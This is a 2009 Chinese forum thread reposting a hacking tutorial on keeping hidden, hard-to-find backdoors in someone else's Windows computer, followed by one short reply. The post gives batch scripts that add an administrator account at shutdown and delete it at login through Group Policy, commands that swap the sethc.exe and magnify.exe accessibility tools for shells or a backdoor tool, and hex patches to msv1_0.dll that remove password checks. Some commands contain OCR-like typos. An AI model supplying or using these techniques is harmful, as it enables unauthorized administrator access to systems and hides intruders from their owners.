论坛风格切换
正版合作和侵权请联系 sd173@foxmail.com
 
  • 帖子
  • 日志
  • 用户
  • 版块
  • 群组
帖子
购买邀请后未收到邀请联系sdbeta@qq.com
  • 2754阅读
  • 1回复

[已解决]打造永远不会被发现的系统后门 [复制链接]

上一主题 下一主题
离线ahyanglf
 
发帖
*
今日发帖
最后登录
1970-01-01
只看楼主 倒序阅读 使用道具 楼主  发表于: 2009-12-16 09:16:45


2009-11-13 10:17在上期的文章中,我们讲解了如何利用系统自动登录的漏洞,揪出被记录在注册表中的密码。拿到了管理员的密码,肯定是要为自己建一个后门了,许多小黑们往往都是直接开始新建帐户,提升权限,然后隐藏新建的管理员帐号,又或者直接进行帐号克隆。其实这些方法用的人多了,也就不是那么隐蔽可靠了。今天,我就把自己平时隐藏后门的方法介绍给小黑们,看看怎样发挥自己的聪明才智,打造自己的后门……
  
  无可检测与删除的“隐藏”后门
  这里我们要给别人的电脑,设置一个永远都检测不到。也无法删除的管理员帐户后门。建立后门的方法是利用开关机脚本,但是与普通的开关机脚本后门有很大的不同!我们先来看看建后门的方法,最后再来看效果。
  
  准备开关机脚本
  首先,获得管理员密码并登录后,打开记事本程序,在里面输入如下内容:
  @echo off
  net user hxhack 123456/add
  net localgroup administrators hxhack/add
  这段语句的作用是,新建—个帐户,并将新建的帐户加入管理员组中。其中,“hxhack”是用户名。“123456”是密码。在这段语句中。还有一个“@echo off”,是在批处理中。用于禁止命令执行后的回显信息的。
  输入完毕后。将文件保存为“关机.bat”。然后再打开记事本程序,在其中输入如下语句:
  @echo off
  net user hxhack/del
  这条语句的作用是,删除系统中名为“hxhack”的帐户名,也就是删除我们刚才新建的帐户名。最后,保存文件名为“启动.bat”。
  
  启用开关机脚本
  点击“开始”菜单-“运行”,输入命令“Gpedit.msc”,回车后打开组策略编辑器程序窗口。依次展开“计算机配置”-“windows设置”-“脚本(启动/关机)”项目。双击右侧的“启动”。打开启动脚本设置对话框。点击“显示文件”按钮,将会自动打开系统启动脚本目录“C:\WINDOWS\System32\GroupPoLicykMachine\ScriptskStartup”。将刚才建立的“启动.bat”移动到此文件夹中。然后关闭文件夹窗口。在启动脚本对话框中。点击“添加”按钮,浏览指定当前目录下的开机脚本文件“启动.bat”。
  点击确定按钮。完成添加。再点击“应用”按钮,使用当前启动设置。关闭启动脚本设置对话框。然后双击组策略编辑器中的“关机”项目,打开关机脚本设置对话框,用同样的方法添加关机脚本为“关机.bat”。最后关闭组策略编辑器。无可检测删除的后门就创建成功了!
  
  开关机后门的不同之处
  我们创建的这个开关机后门。与普通的开关机脚本后门有很大的不同。普通的后门,往往都是在开机启动脚本中。设置添加管理员帐户的语句。让管理员一登录就会自动创建后门。这样的方法有很大的弊病。管理员登录后,肯定会检测系统中的帐户列表,一旦发现非法用户。肯定会将用户删除。即使他下一次登录后,又自动将被删除的帐户创建,但必定会引起管理员的注意,从而揪出后门的根源——开机脚本。
  因此,我们的目的是创建一个特殊的帐户——管理员登录后。检测用户列表,根本发现不了有非法用户。即使检测克隆帐户,也一无所获!但是我们却可以用这个帐户正常的登录!
  这是为什么呢?因为我们设置的关机脚本,是自动创建一个管理员权限的帐户。也就是说,只要管理员登录过系统,当他关机退出后,就会自动在系统中创建一个管理员权限的帐户。然而当管理员登录系统时。却由于开机脚本的作用,自动将我们添加的帐户删除掉了,因此管理员无法检测到根本不存在的非法帐户。也就是说。创建的帐户后门,只存在于系统启动到登录成功之前的这个过程。也就是登录前帐户是存在的,登录后就会被删除,够隐蔽吧!巧妙的3389后门
  除了在本机登录外,我们可能还想留下一个帐户后门,让我们可以从远程3389终端登录。直接建立帐户名是比较危险的方法。我们可以利用Windows系统中特殊的辅助工具来完成这个任务。
  点击“开始”菜单-“运行”,输入命令“CMD”。回车后打开命令提示符窗口。在命令提示符窗口中,执行如下命令:
  copy c:\wmdows\explorer.exe c:\windows\system32\sethc.exe
  copy c:\wmdows\system32\sethc.exe c:\windows\system32\dUcache\sethc.exe
  attrib c:\windows\system32\sethc.exe+h
  atmb c:\wmdows\svstem32\dUcache\sethc.exe+h
  这几句命令的作用,是将系统中的辅助工具“sethc.exe”。替换成为“explerer.exe”,这样就可以在3389或本地登录界面中打开粘滞键开关了。以后在3389远程连接窗口中,连续按下5次Shift键。即可自动打开资源管理器。点击工具栏“向上”按钮。返回到桌面,右键点击“我的电脑”。在弹出菜单中选择“管理”命令,打开管理工具,直接添加用户名即可。也可以打开控制面板中的用户帐户,添加管理员帐户。用同样的原理,也可将“sethc.exe”。替换成为“cmd.exe”,即可在CMDSHELL中执行帐户添加命令。
  小提示
  在windows 2000/xp/vista下,连续按shift键5次,可以运行“sethc,exe”打开粘滞键,而且在登录界面里也可以打开。采用替换“sethc.exe”的文件的方法,就可以实现运行任意程序的目的。其原理类似于将Windows系统的屏保程序替换成“cmd.exe”。就可以打开shell了。
  
  留个放大镜后门
  上面利用的是粘滞键辅助工具。其实系统中还有其它的辅助工具。比如“放大镜”——按下Win+U组合键,即可打开放大镜辅助工具。可以用与上面相同的方法来创建一个后门。不过这里我们利用工具来完成操作,并且还要为后门加上一个密码。
  运行“放大镜后门生成器”,在“后门启动密码”中输入要设置的后门密码。然后点击“生成”按钮,指定生成文件名路径为“C:\ivy.exe”。然后点击“开始”菜单-“运行”。输入命令“CMD”。回车后打开命令提示符窗口。在命令窗口中执行如下命令:
   copy %systemroot%\system32\magnify.exe %systemroot%\system32\nagnify.exe

copy C \ivy exe %systemroot%\system32\magmfy.exe
   copy C:\ivy.exe %systemroot%\system32\dllcache\magnify.exe
  执行命令成功后,后门就创建成功了。以后在本地或3389远程登录界面中。按下Win+U组合键,打开辅助工具对话框,选择“放大镜”,点击“启动”按钮,要求输入设定的后门启动密码。确定后。打开后门程序,可执行“cmd.exe”和程序自己添加自定义用户。直接输入要添加的用户名和密码。点击“添加”按钮即可。要执行CMD命令的话,可点击“执行CMD命令”按钮,即可打开CMD命令提示符窗口。
  
  后备绝招——请空系统密码
  在无可意料的情况下。如果所有的后门都被清除了,那么可以使用这个后备的绝招。Windows系统的“system32”和“dllcache”目录下。都有一个名为“msv1_0.dll”的文件,此文件决定着用户的登录密码。只需对其进行小小的修改,就可以清空所有密码。
  首先。在一台正常的电脑上,运行WinHEX,打开两个目录下的“msv1_0.dll”文件,搜索“F8 10 75 11B0 01 8B 4D”字符串。将其替换为“E0 00 75 11 B001 8B 4D”。这个修改是针对Windows XP SP2系统的。如果是其它的系统。可分别进行如下修改:
  Windows 2000 professional:将“F8 10 0F 84 71 FF FF”修改为“EO 00 0F 84 71 FF FF”;
  Windows 2000 sp4:将“F8 10 75 11 bO 01 8b 4D”修改为“E0 00 75 11 b0 01 8b 4D”;
  Windows 2003 spl:将“F8.10 0F 84 DO B8 FF FF”修改为“E0 00 0F 84DOB8 FF FF”:
  Windows vista:将“F8 10 75 13 B0 01 8B 4D”修改“E0 00 75 1380 01 8B 4D”
  只要修改后,全部管理员帐号无须密码即可本地登录或进行远程登录。将修改后的“msv1-0.dll”复制后,进入要登录主机的DOS环境,替换相应的文件即可。

http://hi.baidu.com/wefans/blog/item/e120610f981052e7aa6457e2.html
离线风晨

发帖
2652
今日发帖
最后登录
2018-03-03
只看该作者 沙发  发表于: 2009-12-16 12:49:20
还有这一手